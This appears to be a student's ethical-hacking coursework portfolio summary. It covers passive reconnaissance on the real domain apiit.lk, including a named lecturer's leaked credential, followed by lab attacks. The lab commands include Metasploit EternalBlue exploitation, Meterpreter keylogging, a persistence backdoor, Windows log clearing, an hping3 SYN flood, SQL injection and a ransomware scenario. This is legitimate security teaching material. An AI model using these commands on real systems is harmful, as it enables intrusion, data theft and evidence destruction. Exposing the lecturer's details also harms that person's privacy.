Kalaichelvan Thieveshkar
Staffordshire University | COMP50009 - Ethical Hacking
Key Differences:
| Aspect | Passive Gathering | Active Gathering |
|----------------------|---------------------------------------|-----------------------------------|
| Target Interaction | No direct contact | Direct system interaction |
| Detection Risk | Low (undetectable) | High (triggers security systems) |
| Data Sources | Public databases, DNS, WHOIS | Port scanning, banner grabbing |
| Legal Considerations | Generally permissible | Requires explicit authorization |Passive Techniques Demonstrated on www.apiit.lk:
-
WHOIS Lookup
- Registrar: APIIT Sri Lanka
- Nameservers: SLT-managed (p1.ns.slt.lk)
- IP: 217.21.91.138 (shared hosting - 45+ sites)
- Location: Hostinger, India (ASN AS47583)
- Screenshot: Page 9
-
DNSDumpster
- 15 subdomains across 3 locations:
- Sri Lanka (9), USA (4), Singapore (2)
- Critical Services:
alms.apiit.lk(AWS Singapore)eclub.apiit.lk(WordPress 6.6.2)
- Screenshot: Pages 11-14
- 15 subdomains across 3 locations:
-
Google Dorking
- Exposed documents:
site:apiit.lk filetype:pdf
- Found: Library rules, staff brochures, sponsorship docs
- Screenshot: Pages 16-20
- Exposed documents:
-
HTML/REST API Analysis
- WordPress 6.6.2 + Elementor 3.23.4
- Vulnerable endpoints:
<link rel="alternate" href="https://apiit.lk/wp-json/oembed/1.0/embed">
- Screenshot: Pages 21-23
-
Pastebin Monitoring
- Credential leak:
jina@apiit.lk(Lecturer) - Verified via HaveIBeenPwned
- Screenshot: Page 20
- Credential leak:
Attacker Setup: Kali Linux VM (192.168.35.135)
Target: Windows Server 2008 VM (192.168.35.136)
# Service Version Detection
nmap -sV 192.168.35.136
# OS Detection
nmap -O 192.168.35.136
# Vulnerability Scanning
nmap --script=vuln 192.168.35.136Full scan summary table: Page 50
Screenshots: Pages 39-49
| Vulnerability | Severity | Root Cause | Real-World Incident |
|---|---|---|---|
| MS17-010 (EternalBlue) | Critical | SMBv1 protocol flaw | WannaCry ransomware (2017) |
| Unsupported OS | Critical | Windows Server 2008 EOL | NotPetya attacks (2017) |
| SMB Signing Disabled | High | Missing message authentication | MITM attacks |
Nessus report: Pages 54-58
Countermeasures documented: Pages 60-63
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.35.136
set LHOST 192.168.35.135
exploitVerification:
- Created folder
Thieveshkar_cb013248on victim desktop - Screenshot capture via Meterpreter (Page 35)
Full exploit sequence: Pages 29-36
-
Keylogging
keyscan_start # Begin capturing keystrokes keyscan_dump # Retrieve captured data
Screenshot: Pages 71-73
-
Persistence Backdoor
use exploit/windows/local/persistence set STARTUP USER exploit- Installed VBS script in startup registry
Screenshots: Pages 74-78
- Installed VBS script in startup registry
-
Covering Tracks
- Cleared logs:
wevtutil cl Security wevtutil cl System wevtutil cl Application
- Deleted evidence file:
del C:\Users\Thieveshkar\Desktop\Thieveshkar.txt
Screenshots: Pages 79-97
- Cleared logs:
Methodology:
graph LR
A[Attacker] --> B[Create Fake WordPress Login]
B --> C[Victim Enters Credentials]
C --> D[Credentials Stolen]
Tools: SocioPhish
Countermeasures:
- Multi-Factor Authentication (Blocks 99% attacks - Kalina & Sundaram, 2023)
- AI Email Filtering (99.6% accuracy - Ahmed et al., 2024)
Screenshots: Pages 98-105
Methodology:
graph TB
A[Botnet] --> B[Flood Target Server]
B --> C[Server Overload]
C --> D[Service Disruption]
Tool: hping3 SYN flood
sudo hping3 -S --flood -p 445 192.168.35.136Countermeasures:
- ML-based detection (XGBoost/CNN - Azadeh Golduzian)
- SDN traffic analysis (Wang et al.)
Screenshots: Pages 108-113
Methodology:
graph LR
A[Malicious Input] --> B[Unsanitized Query]
B --> C[Database Compromise]
Techniques:
- Manual:
1' OR '1'='1input (Page 118) - Automated: SQLMap database dump (Pages 119-122)
Countermeasures:
- Parameterized queries
- ModSec-AdvLearn WAF (Floris et al., 2023)
Screenshots: Pages 114-124
Methodology:
graph TB
A[MSFVenom Payload] --> B[Social Engineering]
B --> C[Victim Execution]
C --> D[File Encryption]
D --> E[Ransom Note]
Execution:
- Created malicious payload
- Sent via spoofed IT department email
- Encrypted desktop files
Screenshots: Pages 125-134
This portfolio demonstrates comprehensive ethical hacking techniques aligned with module requirements:
- Executed 5 passive reconnaissance methods
- Exploited critical vulnerabilities (EternalBlue)
- Demonstrated 4 cyber attacks with countermeasures
- Included identity-verified screenshots throughout
- Referenced 10+ academic sources (2023-2024)
Full 136-page report: PDF Download
- Kalina, P., & Sundaram, D. (2023). Effectiveness of MFA Against Phishing
- Ahmed, M. et al. (2024). PhishSentry: AI-Driven Email Detection
- Floris, G. et al. (2023). ModSec-AdvLearn: Adversarial SQL Injection Defense
- Azadeh Golduzian (2023). Predicting DDoS with Machine Learning
Full references: Pages 135-136
Disclaimer: All activities were performed in a controlled lab environment with written authorization. No real systems were compromised.